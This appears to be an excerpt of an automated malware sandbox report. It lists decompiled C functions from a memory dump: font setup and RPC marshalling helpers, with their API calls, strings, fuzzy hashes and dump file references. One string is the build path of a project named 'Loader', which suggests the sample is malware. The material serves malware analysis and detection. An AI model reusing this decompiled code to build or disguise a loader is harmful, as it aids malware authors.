                                                                                                • Opcode ID: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                                                                                • Instruction ID: ba3132894351e94c97711127f452fc04d7c27ede8e93237e74fa5b384ede3bcd
                                                                                                • Opcode Fuzzy Hash: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                                                                                • Instruction Fuzzy Hash: AAF0A751944B2165E73222AC5C44BFB6B9CDB55712F144437E600B61D186BC5CC29FBA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 67%
                                                                                                			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af7c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af8c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af93 = 1;
				 *0x40af90 = _t11 & 0x00000001;
				 *0x40af91 = _t11 & 0x00000002;
				 *0x40af92 = _t11 & 0x00000004;
				E0040594D(_t18, _t24, _t26, 0x40af98,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af7c);
				_push(_t14);
				_push(_t26);
				E00405889();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                                0x00401d29
                                                                                                0x00401d42
                                                                                                0x00401d4c
                                                                                                0x00401d51
                                                                                                0x00401d5c
                                                                                                0x00401d63
                                                                                                0x00401d75
                                                                                                0x00401d7b
                                                                                                0x00401d80
                                                                                                0x00401d8a
                                                                                                0x004024aa
                                                                                                0x00401561
                                                                                                0x00402825
                                                                                                0x00402880
                                                                                                0x0040288c

                                                                                                APIs
                                                                                                • GetDC.USER32(?), ref: 00401D22
                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                • CreateFontIndirectA.GDI32(0040AF7C), ref: 00401D8A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CapsCreateDeviceFontIndirect
                                                                                                • String ID:
                                                                                                • API String ID: 3272661963-0
                                                                                                • Opcode ID: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                                                                                • Instruction ID: 88b098f1539f08df6dee2951bb44ee62bc7572b1891c100f3a3d81e12d825a95
                                                                                                • Opcode Fuzzy Hash: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                                                                                • Instruction Fuzzy Hash: 5EF04FF1A48741AEE7029770AE1BB9A3B64A715309F104939F142BA1E2C6BC04158B3F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA5070, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 181COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 53%
                                                                                                			E6EDA5070(void* __eflags, int _a4, intOrPtr _a8, signed short* _a12) {
				signed char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t121;
				intOrPtr _t123;
				intOrPtr _t129;
				intOrPtr _t166;
				void* _t204;
				void* _t206;

				_v8 = 0;
				_v16 = 0;
				_v44 =  *((intOrPtr*)(_a4 + 0x1c));
				_v32 = 0;
				_v24 = 0;
				_v20 = 0;
				_v28 = 0;
				0x6eda0000("(%p,%p,%p)\n", _a4, _a8, _a12);
				E6EDA73B0(_a4 + 0x14, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
				_t206 = _t204 + 0x18;
				if( *((intOrPtr*)(_a4 + 0x30)) == 0) {
					_t166 = _a4;
					_t212 =  *((intOrPtr*)(_t166 + 0x6c));
					if( *((intOrPtr*)(_t166 + 0x6c)) == 0) {
						_v36 =  *((intOrPtr*)(_a4 + 0x30));
						_v12 =  *((intOrPtr*)(_a4 + 0x14));
						 *((intOrPtr*)(_a4 + 0x30)) = 1;
						E6EDA5070(_t212, _a4, _a8, _a12);
						 *((intOrPtr*)(_a4 + 0x30)) = _v36;
						 *((intOrPtr*)(_a4 + 0x6c)) =  *((intOrPtr*)(_a4 + 0x14));
						_v32 = 1;
						0x6eda0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x6c)) - _v12);
						_t206 = _t206 + 8;
						 *((intOrPtr*)(_a4 + 0x14)) = _v12;
					}
				}
				_a12 =  &(_a12[2]);
				if( *_a12 != 0) {
					_v8 = _a12 +  *_a12;
				}
				_a12 =  &(_a12[1]);
				if(( *_a12 & 0x0000ffff) != 0) {
					_v16 = _a12 + ( *_a12 & 0x0000ffff);
				}
				_a12 =  &(_a12[1]);
				 *((intOrPtr*)(_a4 + 0x1c)) = _a8;
				if(_v8 != 0) {
					_t129 = _a4;
					0x6eda0000(_t129, _a12);
					_v40 = _t129;
					E6EDACC40( *_v8 & 0x000000ff, _a4, _a8 + _v40, _v8);
					_t206 = _t206 + 0x18;
					_v20 =  *((intOrPtr*)(_a4 + 0x3c));
					_v24 =  *((intOrPtr*)(_a4 + 0x44));
					_v28 =  *((intOrPtr*)(_a4 + 0x40));
				}
				_t121 = E6EDA8B40(_a4, _a8, _a12, _v16);
				_a8 = _t121;
				if(_v8 != 0) {
					 *((intOrPtr*)(_a4 + 0x3c)) = _v20;
					 *((intOrPtr*)(_a4 + 0x44)) = _v24;
					 *((intOrPtr*)(_a4 + 0x40)) = _v28;
					_t121 = E6EDACE70( *_v8 & 0x000000ff, _a4, _a8, _v8, 1);
				}
				 *((intOrPtr*)(_a4 + 0x1c)) = _v44;
				if(_v32 == 0) {
					return _t121;
				} else {
					 *((intOrPtr*)(_a4 + 0x14)) =  *((intOrPtr*)(_a4 + 0x6c));
					_t123 = _a4;
					 *((intOrPtr*)(_t123 + 0x6c)) = 0;
					return _t123;
				}
			}



















                                                                                                0x6eda5076
                                                                                                0x6eda507d
                                                                                                0x6eda508a
                                                                                                0x6eda508d
                                                                                                0x6eda5094
                                                                                                0x6eda509b
                                                                                                0x6eda50a2
                                                                                                0x6eda50ba
                                                                                                0x6eda50dc
                                                                                                0x6eda50e1
                                                                                                0x6eda50eb
                                                                                                0x6eda50ed
                                                                                                0x6eda50f0
                                                                                                0x6eda50f4
                                                                                                0x6eda50fc
                                                                                                0x6eda5105
                                                                                                0x6eda510b
                                                                                                0x6eda511e
                                                                                                0x6eda5129
                                                                                                0x6eda5135
                                                                                                0x6eda5138
                                                                                                0x6eda514e
                                                                                                0x6eda5153
                                                                                                0x6eda515c
                                                                                                0x6eda515c
                                                                                                0x6eda50f4
                                                                                                0x6eda5165
                                                                                                0x6eda5170
                                                                                                0x6eda517b
                                                                                                0x6eda517b
                                                                                                0x6eda5184
                                                                                                0x6eda518f
                                                                                                0x6eda519a
                                                                                                0x6eda519a
                                                                                                0x6eda51a3
                                                                                                0x6eda51ac
                                                                                                0x6eda51b3
                                                                                                0x6eda51b9
                                                                                                0x6eda51bd
                                                                                                0x6eda51c5
                                                                                                0x6eda51e7
                                                                                                0x6eda51ec
                                                                                                0x6eda51f5
                                                                                                0x6eda51fe
                                                                                                0x6eda5207
                                                                                                0x6eda5207
                                                                                                0x6eda521a
                                                                                                0x6eda5222
                                                                                                0x6eda5229
                                                                                                0x6eda5231
                                                                                                0x6eda523a
                                                                                                0x6eda5243
                                                                                                0x6eda5264
                                                                                                0x6eda5269
                                                                                                0x6eda5272
                                                                                                0x6eda5279
                                                                                                0x6eda5294
                                                                                                0x6eda527b
                                                                                                0x6eda5284
                                                                                                0x6eda5287
                                                                                                0x6eda528a
                                                                                                0x00000000
                                                                                                0x6eda528a

                                                                                                APIs
                                                                                                • _NdrComplexStructBufferSize@12.SOZZ(00000000,00000000,00000000), ref: 6EDA511E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: BufferComplexSize@12Struct
                                                                                                • String ID: (%p,%p,%p)$difference = 0x%x
                                                                                                • API String ID: 1319815426-1308788287
                                                                                                • Opcode ID: 96950c64940c8fd3095e5b62f37a4d0d13a46c3978f38573632ab271eaa704c0
                                                                                                • Instruction ID: 58c7fde49c974921dc6da8f0e573822ccf3555090c7f9420528d4f27984938f1
                                                                                                • Opcode Fuzzy Hash: 96950c64940c8fd3095e5b62f37a4d0d13a46c3978f38573632ab271eaa704c0
                                                                                                • Instruction Fuzzy Hash: 7F81E7B4A00209EFDB44CF98C890AAE7BB6FF88354F108558ED199B341D735EA51CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA6310, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 53%
                                                                                                			E6EDA6310(intOrPtr _a4, signed char* _a8) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;

				0x6eda0000("(%p, %p)\n", _a4, _a8);
				if(( *_a8 & 0x000000ff) == 0x1f || ( *_a8 & 0x000000ff) == 0x20) {
					_v5 = (_a8[1] & 0x000000ff) + 1;
					if(( *_a8 & 0x000000ff) != 0x1f) {
						_a8 =  &(_a8[2]);
						_v16 =  *_a8;
						_a8 =  &(_a8[4]);
						_v12 =  *_a8;
						_a8 =  &(_a8[4]);
					} else {
						_a8 =  &(_a8[2]);
						_v16 =  *_a8 & 0x0000ffff;
						_a8 =  &(_a8[2]);
						_v12 =  *_a8 & 0x0000ffff;
						_a8 =  &(_a8[2]);
					}
					_v20 =  *_a8 & 0x0000ffff;
					_a8 =  &(_a8[2]);
					_a8 = E6EDAA540(_a4, _a4, _a8, _v12);
					E6EDA73D0(_a4, _a4 + 4, _v5 & 0x000000ff);
					E6EDAAF00(_a4, E6EDAAEC0(_v20,  *((intOrPtr*)(_a4 + 0x44))));
					 *((intOrPtr*)(_a4 + 0x18)) =  *((intOrPtr*)(_a4 + 0x18)) + _v16;
					E6EDAC7E0(_a4, _a8);
					return  *((intOrPtr*)(_a4 + 0x18));
				} else {
					0x6eda0000("invalid format type %x\n",  *_a8 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return 0;
				}
			}







                                                                                                0x6eda6323
                                                                                                0x6eda633d
                                                                                                0x6eda6394
                                                                                                0x6eda63a9
                                                                                                0x6eda63e0
                                                                                                0x6eda63e8
                                                                                                0x6eda63f1
                                                                                                0x6eda63f9
                                                                                                0x6eda6402
                                                                                                0x6eda63ab
                                                                                                0x6eda63b1
                                                                                                0x6eda63ba
                                                                                                0x6eda63c3
                                                                                                0x6eda63cc
                                                                                                0x6eda63d5
                                                                                                0x6eda63d5
                                                                                                0x6eda640b
                                                                                                0x6eda6414
                                                                                                0x6eda642b
                                                                                                0x6eda643a
                                                                                                0x6eda645a
                                                                                                0x6eda646e
                                                                                                0x6eda6479
                                                                                                0x00000000
                                                                                                0x6eda6353
                                                                                                0x6eda6368
                                                                                                0x6eda6375
                                                                                                0x00000000
                                                                                                0x6eda637b

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6375
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-285380529
                                                                                                • Opcode ID: 55e6c966d91f8de8470c43f36afe8c6a6d8cf4b17d98fbe9669fd89a70e38cdd
                                                                                                • Instruction ID: f11ca3884b36cf119fc4ed7d2712e207cb40720620d49d9c502f10e8a96af2c6
                                                                                                • Opcode Fuzzy Hash: 55e6c966d91f8de8470c43f36afe8c6a6d8cf4b17d98fbe9669fd89a70e38cdd
                                                                                                • Instruction Fuzzy Hash: 19513BB5A04108AFCB44CF99C490AAD7BB6EF89314F04C069FD698F341D635EA51CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA34D0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 64%
                                                                                                			E6EDA34D0(void* __eflags, intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _t67;
				void* _t100;
				void* _t102;
				void* _t103;

				_v12 = _a12[2] & 0x0000ffff;
				0x6eda0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				E6EDA73D0(_a12, _a4 + 4, (_a12[1] & 0x000000ff) + 1);
				_t102 = _t100 + 0x1c;
				_t71 = _a16 & 0x000000ff;
				if((_a16 & 0x000000ff) == 0) {
					if(( *(_a4 + 0x20) & 0x000000ff) == 0 &&  *_a8 == 0) {
						 *_a8 =  *((intOrPtr*)(_a4 + 4));
					}
				} else {
					_t67 = E6EDAA3B0(_t71, _a4, _v12);
					_t102 = _t102 + 8;
					 *_a8 = _t67;
				}
				 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
				_v8 =  *((intOrPtr*)(_a4 + 0x10));
				E6EDAAF00(_a4, _v12);
				_t103 = _t102 + 8;
				if(( *_a12 & 0x000000ff) == 0x16) {
					E6EDAC2B0(_a4, _v8,  *_a8,  &(_a12[4]), _a16 & 0x000000ff);
					_t103 = _t103 + 0x14;
				}
				0x6eda0000("copying %p to %p\n", _v8,  *_a8);
				if( *_a8 != _v8) {
					E6EDB0120( *_a8, _v8, _v12);
				}
				return 0;
			}









                                                                                                0x6eda34dd
                                                                                                0x6eda34f6
                                                                                                0x6eda3518
                                                                                                0x6eda351d
                                                                                                0x6eda3520
                                                                                                0x6eda3526
                                                                                                0x6eda3548
                                                                                                0x6eda355b
                                                                                                0x6eda355b
                                                                                                0x6eda3528
                                                                                                0x6eda3530
                                                                                                0x6eda3535
                                                                                                0x6eda353b
                                                                                                0x6eda353b
                                                                                                0x6eda3566
                                                                                                0x6eda356f
                                                                                                0x6eda357a
                                                                                                0x6eda357f
                                                                                                0x6eda3594
                                                                                                0x6eda35b0
                                                                                                0x6eda35b5
                                                                                                0x6eda35b5
                                                                                                0x6eda35c7
                                                                                                0x6eda35d7
                                                                                                0x6eda35e7
                                                                                                0x6eda35ec
                                                                                                0x6eda35f4

                                                                                                APIs
                                                                                                • _memmove.LIBCMT ref: 6EDA35E7
                                                                                                  • Part of subcall function 6EDAA3B0: NdrAllocate.RPCRT4(00000000,6EDAB93B), ref: 6EDAA3BC
                                                                                                  • Part of subcall function 6EDAA3B0: _memset.LIBCMT ref: 6EDAA3CF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Allocate_memmove_memset
                                                                                                • String ID: (%p,%p,%p,%d)$copying %p to %p
                                                                                                • API String ID: 3695251382-1064448161
                                                                                                • Opcode ID: e6b978eddfc84d8a739c6f0f6c45a67f168a83697eb562fa46348004199192bf
                                                                                                • Instruction ID: 2c198d28c2652f61accd1c74d8cc2661044578390aef53919078c143f97258d9
                                                                                                • Opcode Fuzzy Hash: e6b978eddfc84d8a739c6f0f6c45a67f168a83697eb562fa46348004199192bf
                                                                                                • Instruction Fuzzy Hash: 764131B5604148ABCB04DF9CD890D9E7BBAEF89304F10C559FD599B345E730EA50CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDADCB4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E6EDADCB4(void* __ebx, void* __edi, void* __esi) {
				signed short _t55;
				intOrPtr _t57;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				void* _t103;
				void* _t105;
				void* _t109;
				void* _t110;

				 *(_t103 - 1) = ( *( *((intOrPtr*)(_t103 + 0x14)) + (1 << 0)) & 0x000000ff) + 1;
				 *((intOrPtr*)(_t103 + 0x14)) = E6EDAA440( *(_t103 + 0xc),  *((intOrPtr*)(_t103 + 0x14)) + 4);
				 *((intOrPtr*)(_t103 + 0x14)) = E6EDAA540( *(_t103 + 0xc),  *(_t103 + 0xc),  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c)));
				_t55 =  *(_t103 + 0xc);
				0x6eda0000(_t55,  *((intOrPtr*)(_t103 + 0x14)));
				 *(_t103 - 8) = _t55;
				_t92 =  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c));
				_t57 = E6EDAAEC0( *(_t103 - 8) & 0x0000ffff,  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c)));
				_t109 = _t105 + 0x24;
				 *((intOrPtr*)(_t103 - 0x14)) = _t57;
				_t112 =  *(_t103 + 0x20) & 0x000000ff;
				if(( *(_t103 + 0x20) & 0x000000ff) == 0) {
					_push(0xab4);
					E6EDAFA71(__ebx, _t92, __edi, __esi, _t112, L"fUnmarshall", L"C:\\xampp\\htdocs\\Loct\\fb11756e47a4488bb45f8c56ea0c6221\\Loader\\Project4\\Project4\\Source.c");
					_t109 = _t109 + 0xc;
				}
				if(( *(_t103 + 0x18) & 0x000000ff) == 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10)))) == 0) {
					 *(_t103 + 0x18) = 1;
				}
				if(( *(_t103 + 0x18) & 0x000000ff) != 0) {
					_t69 = E6EDAA3B0( *(_t103 + 0xc),  *(_t103 + 0xc),  *((intOrPtr*)(_t103 - 0x14)));
					_t109 = _t109 + 8;
					 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10)))) = _t69;
				}
				E6EDA73D0( *(_t103 + 0xc) + 4,  *(_t103 + 0xc) + 4,  *(_t103 - 1) & 0x000000ff);
				_t110 = _t109 + 8;
				 *((intOrPtr*)(_t103 - 0x10)) =  *((intOrPtr*)( *(_t103 + 0xc) + 4));
				 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10))));
				 *((intOrPtr*)(_t103 - 0x28)) =  *((intOrPtr*)( *(_t103 + 0xc) + 0x44));
				 *((intOrPtr*)(_t103 - 0x1c)) = 0;
				while( *((intOrPtr*)(_t103 - 0x1c)) <  *((intOrPtr*)(_t103 - 0x28))) {
					_t67 = E6EDA9560( *(_t103 + 0xc),  *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0x14)), 0,  *(_t103 + 0x18) & 0x000000ff);
					_t110 = _t110 + 0x14;
					 *((intOrPtr*)(_t103 - 0x20)) = _t67;
					 *((intOrPtr*)(_t103 - 0x1c)) =  *((intOrPtr*)(_t103 - 0x1c)) + 1;
				}
				_t65 =  *((intOrPtr*)( *(_t103 + 0xc) + 4)) -  *((intOrPtr*)(_t103 - 0x10));
				return _t65;
			}












                                                                                                0x6edadcc6
                                                                                                0x6edadcdc
                                                                                                0x6edadcf6
                                                                                                0x6edadcfd
                                                                                                0x6edadd01
                                                                                                0x6edadd09
                                                                                                0x6edadd10
                                                                                                0x6edadd19
                                                                                                0x6edadd1e
                                                                                                0x6edadd21
                                                                                                0x6edadd28
                                                                                                0x6edadd2a
                                                                                                0x6edadd2c
                                                                                                0x6edadd3b
                                                                                                0x6edadd40
                                                                                                0x6edadd40
                                                                                                0x6edadd49
                                                                                                0x6edadd53
                                                                                                0x6edadd53
                                                                                                0x6edadd5d
                                                                                                0x6edadd67
                                                                                                0x6edadd6c
                                                                                                0x6edadd72
                                                                                                0x6edadd72
                                                                                                0x6edadd80
                                                                                                0x6edadd85
                                                                                                0x6edadd8e
                                                                                                0x6edadd96
                                                                                                0x6edadd9f
                                                                                                0x6edadda2
                                                                                                0x6edaddb4
                                                                                                0x6edaddcf
                                                                                                0x6edaddd4
                                                                                                0x6edaddd7
                                                                                                0x6edaddb1
                                                                                                0x6edaddb1
                                                                                                0x6edadde2
                                                                                                0x6edade07

                                                                                                APIs
                                                                                                  • Part of subcall function 6EDAAEC0: RpcRaiseException.RPCRT4(000006C6,?,?), ref: 6EDAAEE3
                                                                                                • __wassert.LIBCMT ref: 6EDADD3B
                                                                                                  • Part of subcall function 6EDAFA71: GetModuleHandleExW.KERNEL32(00000006,?,?), ref: 6EDAFB36
                                                                                                  • Part of subcall function 6EDAFA71: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6EDAFB62
                                                                                                Strings
                                                                                                • C:\xampp\htdocs\Loct\fb11756e47a4488bb45f8c56ea0c6221\Loader\Project4\Project4\Source.c, xrefs: 6EDADD31
                                                                                                • fUnmarshall, xrefs: 6EDADD36
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Module$ExceptionFileHandleNameRaise__wassert
                                                                                                • String ID: C:\xampp\htdocs\Loct\fb11756e47a4488bb45f8c56ea0c6221\Loader\Project4\Project4\Source.c$fUnmarshall
                                                                                                • API String ID: 172140284-267874950
                                                                                                • Opcode ID: b0cf3447c02a1fb4e14999fbaf84d01b9d17e4486575f10e6ce410e178ffa9a4
                                                                                                • Instruction ID: d5962b6373103857557095deff8fab07be459c82d338c61e474b070689566684
                                                                                                • Opcode Fuzzy Hash: b0cf3447c02a1fb4e14999fbaf84d01b9d17e4486575f10e6ce410e178ffa9a4
                                                                                                • Instruction Fuzzy Hash: 0E4152B5A00249AFCF44CF98D890ADE7BB5AF49308F148559FD19AB341E335DA11CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAE3A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: unhandled embedded type %02x$unknown type 0x%x
                                                                                                • API String ID: 0-2047435921
                                                                                                • Opcode ID: 9ec65198c260007dee1c82979dd69c5917c6ec56142e83531dcc1c96435c9326
                                                                                                • Instruction ID: e32acf22ea63e8a0b1b2e70e9ecce075ea519c9b2d0d89767a1a0b96a7b40e36
                                                                                                • Opcode Fuzzy Hash: 9ec65198c260007dee1c82979dd69c5917c6ec56142e83531dcc1c96435c9326
                                                                                                • Instruction Fuzzy Hash: 0B415770A04464EFDB04CF9DD440BA8B7B6EB42B11F10C16AFEA98B381D675DB81CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA16F0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA16F0(intOrPtr _a4, intOrPtr _a8, signed char* _a12) {
				signed char* _v8;
				signed char* _v12;
				signed int _v16;

				_v8 = _a12;
				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
				if(( *_v8 & 0x000000ff) == 0x1d || ( *_v8 & 0x000000ff) == 0x1e) {
					E6EDA7400(_v8, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					if(( *_v8 & 0x000000ff) != 0x1d) {
						_v12 = _a12;
						_v16 =  *((intOrPtr*)(_v12 + 2));
						_a12 = _v12 + 6;
					} else {
						_v16 = _v8[2] & 0x0000ffff;
						_a12 =  &(_v8[4]);
					}
					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
					E6EDAB030(_a4, _a8, _v16);
					_a12 = E6EDABFC0(_a4, _a8, _a12);
					return 0;
				} else {
					0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return 0;
				}
			}






                                                                                                0x6eda16f9
                                                                                                0x6eda170d
                                                                                                0x6eda171e
                                                                                                0x6eda1763
                                                                                                0x6eda1774
                                                                                                0x6eda178e
                                                                                                0x6eda1797
                                                                                                0x6eda17a0
                                                                                                0x6eda1776
                                                                                                0x6eda177d
                                                                                                0x6eda1786
                                                                                                0x6eda1786
                                                                                                0x6eda17ac
                                                                                                0x6eda17bb
                                                                                                0x6eda17d7
                                                                                                0x00000000
                                                                                                0x6eda172b
                                                                                                0x6eda1737
                                                                                                0x6eda1744
                                                                                                0x00000000
                                                                                                0x6eda174a

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA1744
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
